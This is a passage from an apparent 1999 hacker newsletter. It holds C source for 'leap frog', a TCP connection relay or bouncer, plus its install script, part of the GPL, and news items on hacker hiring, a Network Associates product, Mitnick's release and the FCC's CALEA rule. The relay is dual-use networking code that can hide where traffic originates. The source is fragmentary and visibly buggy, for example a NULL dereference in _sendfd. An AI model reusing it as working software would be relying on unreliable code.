send_fd(p,"Could not resolve that address\n"); (void)time(&time_now); log_file("failed_connect","addr:%s could not connect to %s - %s",p->inetaddr,(p->name ? p->name : "NO NAME"),ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } p->host_entry_add=gethostbyaddr((char *)&p->temp_long, 4, AF_INET); if (p->name) { if (!strcasecmp((char *)p->name, hostname) || !strcasecmp((char *)p->name,host_name) || !strcasecmp((char *)p->name,"localhost")) { SENDFD(p,"Sorry But you cannot connect back to me!\n"); (void)time(&time_now); log_file("reconnect","server name:%s inet addr:%s attempted to reconnect to us - %s",p->name,p->inetaddr,ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } } else if (!strcasecmp((char *)p->host_entry_add,p->inetaddr)) { SENDFD(p,"Sorry But you cannot connect back to me!\n"); (void)time(&time_now); log_file("reconnect","server name:%s inet addr:%s attempted to reconnect to us - %s",p->name,p->inetaddr,ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } if (p->flags & _VERBOSE) SENDFD(p,"Attempting a connection to %s on port %d\nPlease Wait...\n",p->name,p->remote_port); (void)time(&time_now); log_file("login_attempt","server name:%s is attempting to connect to %s on port %d - %s",p->inetaddr,p->name,p->remote_port,ctime(&time_now)); if ((p->remote_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { SENDFD(p,"Ratts Could not get socket()\n"); (void)time(&time_now); log_file("socket","Could not get socket - %s",ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } p->remote_addr.sin_family = p->host_entry->h_addrtype; p->remote_addr.sin_port = htons(p->remote_port); memcpy(&p->remote_addr.sin_addr, p->host_entry->h_addr, p->host_entry->h_length); p->address.sin_family=AF_INET; p->address.sin_port=p->remote_port; p->address.sin_addr=*(struct in_addr *)*p->host_entry->h_addr_list; if (connect(p->remote_sock, (struct sockaddr *)&p->remote_addr, sizeof(p->remote_addr))) { SENDFD(p,"Could not connect to %s on port %d\n",p->name,p->remote_port); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } p->remote2_sock=p_t->socket; (void)time(&time_now); log_file("login_success","server %s logged into %s port %d - %s",p->inetaddr,p->name,p->remote_port,ctime(&time_now)); // enter the connect loop // if not originally found then log it if (!found) { write_out(p); } while (1) { FD_ZERO(&p->select_1); FD_ZERO(&p->select_2); FD_SET(p->remote2_sock,&p->select_1); FD_SET(p->remote2_sock,&p->select_2); FD_SET(p->remote_sock,&p->select_1); FD_SET(p->remote_sock,&p->select_2); if (select(20, &p->select_1, NULL, &p->select_2, NULL) == -1) { free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } if (FD_ISSET(p->remote2_sock,&p->select_1) || FD_ISSET(p->remote2_sock,&p->select_2)) { if ((p->bytes_read = read(p->remote2_sock,buf,4096)) <= 0) { (void)time(&time_now); log_file("closed_socket","closed socket for %s connect to %s - %s",p->inetaddr,p->name,ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } if ((write(p->remote_sock,buf,p->bytes_read)) <= 0) { (void)time(&time_now); log_file("closed_socket","closed socket for %s connect to %s - %s",p->inetaddr,p->name,ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); // close this fd close(p->remote_sock); pthread_exit(NULL); return 0; } } else if (FD_ISSET(p->remote_sock,&p->select_1) || FD_ISSET(p->remote_sock,&p->select_2)) { if ((p->bytes_read = read(p->remote_sock,buf,4096)) <= 0) { (void)time(&time_now); log_file("closed_socket","closed socket for %s connect to %s - %s",p->inetaddr,p->name,ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); // close this fd close(p->remote_sock); pthread_exit(NULL); return 0; } if ((write(p->remote2_sock,buf,p->bytes_read)) <= 0) { (void)time(&time_now); log_file("closed_socket","closed socket for %s connect to %s - %s",p->inetaddr,p->name,ctime(&time_now)); close(p_t->socket); // close this fd close(p->remote_sock); pthread_exit(NULL); return 0; } } } free(p->stack); free(p->totell); free(p); close(p_t->socket); // close this fd close(p->remote_sock); pthread_exit(NULL); return 0; } void show_login(struct frog *p) { p->term=1; // use this if you want a more elaborte welcome } // not used could be to clean the code up.... void close_socket(struct frog *current) { close((int)current->socket); RAMUSED-=sizeof(current->the_data); RAMUSED-=sizeof(current->data); RAMUSED-=sizeof(current->command); RAMUSED-=sizeof(current->line); RAMUSED-=sizeof(current->stack); RAMUSED-=sizeof(current->oldstack); RAMUSED-=sizeof(current->totell); } /* backspace */ void backspace(struct frog * p) { p->buffer[p->count] = 0; if (p->count > 0) p->count--; } // used for all those telnet options... void telnet_options(struct frog *p) { unsigned char c; if (read(p->socket, &c, 1) != 1) return; switch (c) { case EC: backspace(p); break; case EL: p->count = 0; break; case IP: close_socket(p); break; case WILL: case DO: if (read(p->socket, &c, 1) != 1) return; switch (c) { case TELOPT_ECHO: break; case TELOPT_SGA: break; case TELOPT_EOR: send_fd(p, "\377\031"); break; } break; case WONT: case DONT: if (read(p->socket, &c, 1) != 1) return; switch (c) { case TELOPT_ECHO: break; case TELOPT_SGA: break; case TELOPT_EOR: break; } break; } } // get some input void get_input(struct frog *p) { int chars_ready = 0; char c; errno = 0; if (ioctl(p->socket, FIONREAD, &chars_ready) == -1) { log_file("ioctl","IOCTL Error getinput: user disconnect?"); log_file("ioctl",p->name); close_socket(p); p->flags|=PANIC; pthread_exit(NULL); return; } // need bc of non blockio if (!chars_ready) { log_file("ioctl","Chars ready==0"); log_file("ioctl",p->name); close_socket(p); p->flags|=PANIC; pthread_exit(NULL); return; } for (; !(p->flags & PANIC) && chars_ready; chars_ready--) if (read(p->socket, &c, 1) != 1) { p->flags|=PANIC; log_file("error","Read Error on get input"); close_socket(p); pthread_exit(NULL); return; } else switch (c) { case -1: p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N); telnet_options(p); return; break; case '\n': p->flags |= LAST_CHAR_WAS_N; p->buffer[p->count] = 0; return; break; default: p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N); if (c == 8 || c == 127 || c == -9) { backspace(p); break; } if ((c > 31) && (p->count < (IBUFFER_LENGTH - 3))) { p->buffer[p->count] = c; p->count++; out_current++; out_pack_current++; } else { } break; } } // used to clear a screen if the correct term is set void cls(struct frog *p, char *str) { if (p->term>0) { send_fd(p,terms[(p->term)-1].cls); } else { send_fd(p,"Sorry you must set a term type first"); } } // this sends to the fd just text no vsprintf that is the SENDFD void send_fd(struct frog *p, char *str) { char *str2; if (!str) return; if (!p) return; if ((p->socket<0) || (p->flags & PANIC)) return; if ((p->socket<0) || (p->flags & PANIC)) return; str2=review_sendfd(p,str); if (!str2) return; if (write((int)p->socket,str2,strlen(str2))<0) { p->flags|=PANIC; log_file("sigpipe","Sigipipe: from output to frog, at time ->"); return; } } // use this when impleting a ll to send data/??? to other open fd on the server void _sendfd(struct frog *p, char *str) { char *name; struct frog *info; info=NULL; if (!str) { send_fd(p,"usage: sendfd {connected_ip} {message/data}\n"); return; } /* we are only expecting one name at a time for now */ if (!(name=parse(str,1," "))) { send_fd(p,"usage: sendfd {connected_ip} {message/data}\n"); return; } if ((p==info)) { send_fd(p,"Hey Dumb ass that is your ip\n"); return; } if (!((char *)str = strchr(str,' '))) { send_fd(p,"usage: sendfd {connected_ip} {message/data}\n"); return; } str++; SENDFD(info,"%s sends to you %s\n",p->name,str); SENDFD(p," %s sent to %s\n",info->name,str); } // again could be used by admin command on port+1 void shut_down(struct frog *p, char *str) { char buf[255]; sprintf(buf,"%s is shutting down from ip# %s",p->name,p->inetaddr); log_file("shutdown","SHUTTING DOWN "); log_file("shutdown",buf); send_fd(p,"SHutting Down....\n"); exit(-1); return; } // old functions to keep time/mem of daemon...internal functions void time_frog_server_up(struct frog *p) { double time_on; time_t time_now; int x,y; p->no_secs=0; p->no_mins=0; p->no_hours=0; p->no_days=0; time_now=time((time_t *)0); time_on=(double )difftime(time_now,timeval); if (time_on>86380) { p->no_secs=((int)time_on % 60); x=(time_on/60); p->no_mins=(x % 60); y=(x/60); p->no_hours=(y % 24); p->no_days=(y/24); return; } if (time_on>3600) { p->no_secs=((int)time_on % 60); x=(time_on/60); p->no_mins=(x%60); p->no_hours=(x/60); return; } if (time_on>60) { p->no_secs=((int)time_on % 60); p->no_mins=((int)time_on / 60); return; } /* sec only */ p->no_secs=time_on; } // same as above...except a small twist void time_up(struct frog *p, char *str) { time_t time_rightnow; (void)time(&time_rightnow); SENDFD(p,"MY Code is now in version #%s since date %s\n",VERSION,VERSION_DATE); SENDFD(p,"The date is: %s\r",ctime(&timeval)); SENDFD(p,"And Has Been Up For: "); time_frog_server_up(p); if (p->no_days) { SENDFD(p," %d days",p->no_days); } if (p->no_hours) { SENDFD(p," %d hour(s)",p->no_hours); } if (p->no_mins) { SENDFD(p," %d minute(s)",p->no_mins); } if (p->no_secs) { SENDFD(p," %d second(s)",p->no_secs); } SENDFD(p,"\r\nAnd "); if (logins<2) SENDFD(p,"%d people have used leap frog.\n",logins); else SENDFD(p,"%d people have used leap frog.\n",logins); } return 0; } int read_in(struct frog *p) { struct saved_player sp; FILE *fp; char dn[100]; sprintf(dn,"%s/files/%s",ROOT,USERS_ADDRESS_FILE); if (!(fp=fopen(dn,"rb"))) { return 0; } while(!(feof(fp))) { fread(&sp,sizeof(struct saved_player),1,fp); if (!(feof(fp))) { if (!strcasecmp(p->inetaddr,sp.inetaddr)) { strcpy(p->name,sp.remote); p->remote_port=sp.port; fclose(fp); return 1; } } } fclose(fp); return 0; } int write_out(struct frog *p) { FILE *fp; struct saved_player sp; char dn[100]; sprintf(dn,"%s/files/%s",ROOT,USERS_ADDRESS_FILE); if (!(fp=fopen(dn,"ab"))) { fp=fopen(dn,"wb"); } strcpy(sp.inetaddr,p->inetaddr); strcpy(sp.remote,p->name); sp.port=p->remote_port; if (!fp) { return 0; } if (fwrite(&sp,sizeof(struct saved_player),1,fp)!=1) { fclose(fp); return 0; } fclose(fp); return 1; } on ***" echo $N "Logging? (y/n) " read yn case "$yn" in "yes" | "Y" | "Yes" | "y" | "YES" ) LOGGING=1;; "no" | "No" | "NO" | "N" | "n" ) LOGGING=0;; * ) LOGGING=1;; esac echo "" echo "Instaling in the directory $PWD/" echo "Doing Config For System Type $HOST" echo "Configuring to listen on port $PORT" if [ "$LOGGING" -eq 0 ] then echo "With logging shut off" else echo "With logging turned on" fi echo "" echo $N "Is This Config Ok to Use? (y/n) " read yn case "$yn" in "yes" | "Y" | "Yes" | "y" | "YES" ) echo "Doing Configs";; "no" | "No" | "NO" | "N" | "n" ) exit 0;; * ) exit 0;; esac # Makefile if [ "$HOST" = "Linux" ] then cp src/Makefile.linux src/Makefile cp src/include/originalconfig.h src/include/config.h sed 's/\/\/#define LINUX 1/#define LINUX 1/g' src/include/config.h > src/include/config2.h if [ "$LOGGING" -eq 0 ] then sed 's/#define LOGGING 1/\/\/ #define LOGGING 1/g' src/include/config2.h > src/include/config3.h mv src/include/config3.h src/include/config2.h fi echo "#define DEFAULT_PORT $PORT" >> src/include/config2.h echo "#define SERVERPORT $PORT" >> src/include/config2.h echo "#define ROOT \"$PWD/\"" >> src/include/config2.h mv src/include/config2.h src/include/config.h fi if [ "$HOST" = "SunOS" ] then cp src/Makefile.sunos src/Makefile cp src/include/originalconfig.h src/include/config.h sed 's/\/\/#define SOLARIS 2/#define SOLARIS 2/g' src/include/config.h > src/include/config2.h if [ "$LOGGING" -eq 0 ] then sed 's/#define LOGGING 1/\/\/ #define LOGGING 1/g' src/include/config2.h > src/include/config3.h mv src/include/config3.h src/include/config2.h fi echo "#define DEFAULT_PORT $PORT" >> src/include/config2.h echo "#define SERVERPORT $PORT" >> src/include/config2.h echo "#define ROOT \"$PWD/\"" >> src/include/config2.h mv src/include/config2.h src/include/config.h fi cd src/ echo "Type cd src/" echo "type make all" echo "Then you can cd ../bin to run the program" ull compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) 19yy <name of author> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) 19yy name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. <signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Library General Public License instead of this License. @HWA 81.0 Working for the Man ~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by turtlex Dark Tangent (Jeff Moss) offers his thoughts to Wired on the hiring of 'hackers' and their place in mainstream corporate society. Wired http://www.wired.com/news/news/business/story/21879.html Cracking for the Man by Joanna Glasner 3:00 a.m. 23.Sep.99.PDT Nearly two years ago, when Jeff Moss took a job as director of security assessment for Secure Computing, the idea of hacker types joining the computer security work force seemed far-fetched. Not any more. Applications from even the big-name companies were notoriously full of holes, after all, and there weren't many people who knew how to find them. "Companies hired people from the underground because there were no other people available," said Moss, who is also known in tech circles as the organizer of DefCon, the annual Las Vegas gathering of hackers and computer security types. Although corporations shied away from hiring anyone with an actual criminal record, they weren't picky about how somebody acquired their skills. So a mini-industry emerged around the idea of "ethical hacking." The phrase inspires images of black-clad code pushers trading in underground connections for a corporate job, but the reality is more mundane. "There are a lot of people from the hacking scene who are in corporate America, working away," Moss said. "There's no incentive for them to draw attention to their past." These days, Moss is doing what he can to establish closer ties between the security side and the hacker underground. In July, he organized the third session of Black Hat briefings, a computer security conference bringing together corporate types, freelance hackers, and government officials to hash out hot topics affecting the industry. The last session, held in Las Vegas, touched on everything from the psychological profiling of virus writers to the military strategy for defeating cyber-terrorists. This fall, Moss is ranging far afield, launching Black Hat seminars in Amsterdam and Singapore, with a similar mix of officials and geeks. "It has that sort of mystique in the sense of the people who are speaking," Moss said. "One might be in a business suit, and then you'll have a guy from Canada with blue hair talking about ways to subvert dynamic routing protocols." Edginess aside, Moss said he hopes to keep the focus pretty technical. The hot topic will be computer forensics: the collection and analyzing of information after a break-in occurs to evaluate damage and track down perpetrators. These skills are increasingly in demand. According to the San Francisco-based Computer Security Institute, damage caused to companies by computer break-ins is steadily on the rise. A survey found that over a three-year period, the number of companies reporting security breaches rose from 17 to 32 percent. There is no widely accepted figure for the total cost of computer break-ins nationally, but estimates range in the hundreds of millions of dollars, possibly billions on a global scale. As companies put more information on public networks, and do more business online, they run an increasing risk of being cracked. So naturally, computer security firms are seeing a growing demand for services, Moss said. Besides Moss' Secure Computing, a number of corporate heavyweights -- including Ernst & Young, the accounting firm, and IBM, which coined the term "ethical hacker" -- have beefed up their outfits. Moss' firm has expanded its security division from four people to about 40 in a year and a half. Like any other computer job, most of the work consists of sitting in front of a screen, an activity not necessarily imbued with hacking counterculture mystique. Still, Secure Computing provides opportunities for employees to play the criminal. A few companies, in addition to getting their computer networks checked out, hire security specialists to come to their offices and attempt to commit crimes. Moss says low-tech approaches often work best, like dumpster diving for corporate documents or calling up and impersonating a sales rep in an attempt to get information about a company's computer set-up. In recent months, security specialists have pulled stunts like dressing up as a package-delivery person to sneak into offices and steal confidential information. However, such special missions are still the exception. With so many security loopholes that can be exploited from afar, there's not much need to show up in person. "Most clients are more concerned about their network," Moss said. "Only the clients that think they have everything covered are willing to do the more avant-garde stuff." @HWA 82.0 NAI Prepares Security Product of the Future ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by n00ne Security solutions provider Network Associates is set to come out with the "network security solution of the future". "Active Network Security",, is a server sans most of the human elements in maintaining the security of an information system. It is said to have to ability to sense intrusions and deploy security levels without human intervention, therefore making protection available all the time, even on "wee hours" when the sys admins are mostly in bed. Computer Currents http://www.currents.net/newstoday/99/09/23/news3.html Yahoo News http://au.dailynews.yahoo.com/headlines/230999/nbtech/938012220-805937189.html Computer Currents; Daily News Intelligent Net Security By Joel D Pinaroc, Metropolitan Computer Times. September 23, 1999 Top security "solutions" provider Network Associates Inc. [NASDAQ:NETA] is set to introduce Active Network Security, a new technology that the company calls the "network security solution of the future." The new "solution," according to Dean Mansfield, NAI vice president for Asia Pacific, is "essentially a server that eliminates most of the human elements" in maintaining the security of a corporate information system. Mansfield said most corporate information systems still deploy firewall-protected security "solutions" that are sometimes vulnerable to intrusions. Mansfield explained that the typical incursion would involve unauthorized access to a network or a specific application. What the firewall or any security "solution" usually does, Mansfield said, is to "notify" the network administrator of the unauthorized access. The usual standard operating procedure then, Mansfield noted, is that the administrator "sends" out instruction to the network to block the "intruder." This instructions, or "policies," are usually implemented by the administrator on a "need to" basis. Mansfield said this set up has proven to be effective. However, intrusions and unauthorized access attempts sometimes occur during the "wee hours of the morning" when the administrator is not able to implement the security policies when they are needed. Mansfield said the period when the administrator cannot implement security policies is the time when the network is most vulnerable to "intruders" or even computer viruses. The intruder or the computer virus is thus given the time "to do damage" to the information system. For computer viruses, Mansfield cited the case of "Melissa" and "Chernobyl," two recent viruses. What is the Active Network Security Solution? Mansfield said NAI is bringing in its latest security products that can protect a corporate IS to handle hostile external threats. He added that the technology behind Active Network is the "intelligence" of the "solution" to deploy policies even without human intervention. Said to be an automating tool, Mansfield said that the Active Network Security system is "not a firewall" but a "server" that can initiate more interactions among a network's security levels. This apparently means that even without the policies the administrator has to implement, Active Security can both sense intrusion and deploy the security levels to address the "attack." Mansfield said this would mean that at any given time, the corporate IS is protected by the Active Security system. Although Active Security technology is relatively new, Mansfield said NAI is set to bring the technology to the mass market by year-end. "We see Active Security as, not only a corporate security tool, but as a potentially very useful tool for home users," said Mansfield. Yahoo News; Thursday 23 September 12:57 AM Network Associates Intros "Intelligent" Net Security Top security "solutions" provider Network Associates Inc. [NASDAQ:NETA] is set to introduce Active Network Security, a new technology that the company calls the "network security solution of the future." The new "solution," according to Dean Mansfield, NAI vice president for Asia Pacific, is "essentially a server that eliminates most of the human elements" in maintaining the security of a corporate information system. Mansfield said most corporate information systems still deploy firewall-protected security "solutions" that are sometimes vulnerable to intrusions. Mansfield explained that the typical incursion would involve unauthorized access to a network or a specific application. What the firewall or any security "solution" usually does, Mansfield said, is to "notify" the network administrator of the unauthorized access. The usual standard operating procedure then, Mansfield noted, is that the administrator "sends" out instruction to the network to block the "intruder." This instructions, or "policies," are usually implemented by the administrator on a "need to" basis. Mansfield said this set up has proven to be effective. However, intrusions and unauthorized access attempts sometimes occur during the "wee hours of the morning" when the administrator is not able to implement the security policies when they are needed. Mansfield said the period when the administrator cannot implement security policies is the time when the network is most vulnerable to "intruders" or even computer viruses. The intruder or the computer virus is thus given the time "to do damage" to the information system. For computer viruses, Mansfield cited the case of "Melissa" and "Chernobyl," two recent viruses. What is the Active Network Security Solution? Mansfield said NAI is bringing in its latest security products that can protect a corporate IS to handle hostile external threats. He added that the technology behind Active Network is the "intelligence" of the "solution" to deploy policies even without human intervention. Said to be an automating tool, Mansfield said that the Active Network Security system is "not a firewall" but a "server" that can initiate more interactions among a network's security levels. This apparently means that even without the policies the administrator has to implement, Active Security can both sense intrusion and deploy the security levels to address the "attack." Mansfield said this would mean that at any given time, the corporate IS is protected by the Active Security system. Although Active Security technology is relatively new, Mansfield said NAI is set to bring the technology to the mass market by year-end. "We see Active Security as, not only a corporate security tool, but as a potentially very useful tool for home users," said Mansfield. @HWA 83.0 Mitnick Release Date Set ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Macki Prison authorities have set January 21, 2000 as the day Kevin Mitnick will finnally be released from prison. At that time it will be almost five years that Kevin has spent behind bars. 2600.com http://www.2600.com/2600new/092499.html MITNICK RELEASE DATE SET 9/24/99 According to prison authorities, Kevin Mitnick will be released from prison on Friday, January 21, 2000. At that time he will have served 1,792 days in federal custody - nearly five years. At this time, we don't know if there will be a public celebration or any other events. If there are, they would most likely occur in either Los Angeles or Las Vegas, since those are the two cities Kevin's relatives are in. Please check the 2600 and Free Kevin sites for updates. We are changing the Kevin Mitnick Lockdown Clock to the Kevin Mitnick Freedom Countdown Clock effective immediately. If you have the clock on your site, please download the new one to reflect this change. @HWA 84.0 FCC Gives Final Ruling on CALEA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond The Federal Communications Commission has released its final ruling on the Communications Assistance for Law Enforcement Act (CALEA). This Act establishes the rules telecommunications carriers must comply with which allow law enforcement agencies the ability to conduct electronic surveillance on their networks. Federal Register http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=1999_register&docid=99-24853-filed [Federal Register: September 23, 1999 (Volume 64, Number 184)] [Rules and Regulations] [Page 51462-51470] From the Federal Register Online via GPO Access [wais.access.gpo.gov] [DOCID:fr23se99-18] ======================================================================= ----------------------------------------------------------------------- FEDERAL COMMUNICATIONS COMMISSION 47 CFR Part 64 [CC Docket No. 97-213; FCC 99-11] Implementation of the Communications Assistance for Law Enforcement Act AGENCY: Federal Communications Commission. ACTION: Final rule. ----------------------------------------------------------------------- SUMMARY: This document establishes limited rules to ensure that carriers have policies and procedures in place that require the affirmative intervention by and knowledge of, their employees in effectuating any interception through their switching premises, and that such interception is done lawfully and documented carefully. The decision mandates that this be done by appointment of a designated senior officer or employee by each carrier company who is responsible for maintaining such security procedures. The decision also establishes reporting and recordkeeping requirements for informing law enforcement officials of all acts of unauthorized electronic surveillance that occur on the carriers' premises, as well as any compromises of the carriers' systems security and integrity procedures that involve the execution of electronic surveillance. Finally, the decision adopts filing requirements for large and small carriers. This document contains modified information collections subject to the Paperwork Reduction Act of 1995 (PRA), Public Law 104-13, and has been submitted to the Office of Management and Budget (OMB) for review under the section 3507 of the PRA. DATES: Effective December 22, 1999 except for Secs. 64.2103, 64.2104, and 64.2105, which contain information collection requirements that have not been approved by the Office of Management and Budget. The FCC will publish a document in the Federal Register announcing the effective date for those sections. Public comment on the information collections are due November 22, 1999. FOR FURTHER INFORMATION CONTACT: Thomas Wasilewski, 202-418-1310. For further information concerning the information collections contained in this Report and Order, contact Les Smith, Federal Communications Commission, Room 1A-804, 445 12th Street, S.W., Washington, DC 20054, or via the Internet at lesmith@fcc.gov. SUPPLEMENTARY INFORMATION: This is a summary of the Commission's Report and Order (R&O) in CC Docket No. 97-213; FCC 99-11, adopted January 29, 1999, and released March 15, 1999. The complete text of this R&O is available for inspection and copying during normal business hours in the FCC Reference Information Center, Courtyard Level, 445 12th Street, S.W., Washington, DC, and also may be purchased from the Commission's copy contractor, International Transcription Services (ITS, Inc.), CY- B400, 445 12th Street, S.W., Washington, DC. Synopsis of the Report and Order 1. The Commission adopts a Report and Order (R&O) in CC Docket No. 97-213, regarding implementation of the Communications Assistance for Law Enforcement Act (CALEA).<SUP>1</SUP> The R&O establishes systems security and integrity regulations that all telecommunications carriers must follow to comply with section 105 of CALEA. The regulations were proposed in the Notice of Proposed Rule Making (NPRM) in this proceeding, which can be found at 62 FR 63302, November 11, 1997. The R&O adopts these regulations pursuant to the authority granted to the Commission under section 105 of CALEA and section 229 of the Communications Act of 1934, as amended. Accordingly, the R&O finds that telecommunications carriers must ensure that ``any interception of communications or access to call-identifying information effected within its switching premises can be activated only in accordance with a court order or other lawful authorization and with the affirmative intervention of an individual officer or employee of the carrier'' <SUP>2</SUP> acting in accordance with the regulations adopted in the R&O and sections 229(b) and (c) of the Communications Act. --------------------------------------------------------------------------- \1\ Public Law 103414, 108 Stat. 4279 (1994). \2\ 47 U.S.C. 1004. --------------------------------------------------------------------------- 2. While recognizing that certain carriers currently have existing policies and procedures in place to secure and protect their telecommunications systems in a manner that would comply with section 105 of CALEA and sections 229(b) and (c) of the Communications Act, the R&O finds that the void created by those carriers without such policies and procedures demands adoption of minimum set of requirements that will ensure compliance with section 105 of CALEA and sections 229(b) and (c) of the Communications Act. The R&O declines, however, to adopt specific or detailed policies and procedures that telecommunications carriers must include within their internal operating practices to ensure compliance, because, as the R&O further finds, it is not the Commission's responsibility to ``micro-manage'' telecommunications carriers' corporate policies. The rules adopted in the R&O are intended to provide carriers with guidance as to the minimum requirements necessary to achieve compliance with section 105 of CALEA and sections 229(b) and (c) of the Communications Act in the least burdensome manner possible. 3. The R&O mandates that carriers, as part of their policies and procedures, must appoint the senior authorized officer(s) or employee(s) whose job function includes being a point of contact for law enforcement on a daily, around-the-clock basis. Carriers must include in their policies and procedures a description of the job functions of such points of contact and a method to enable law enforcement authorities to contact these individuals. 4. Although 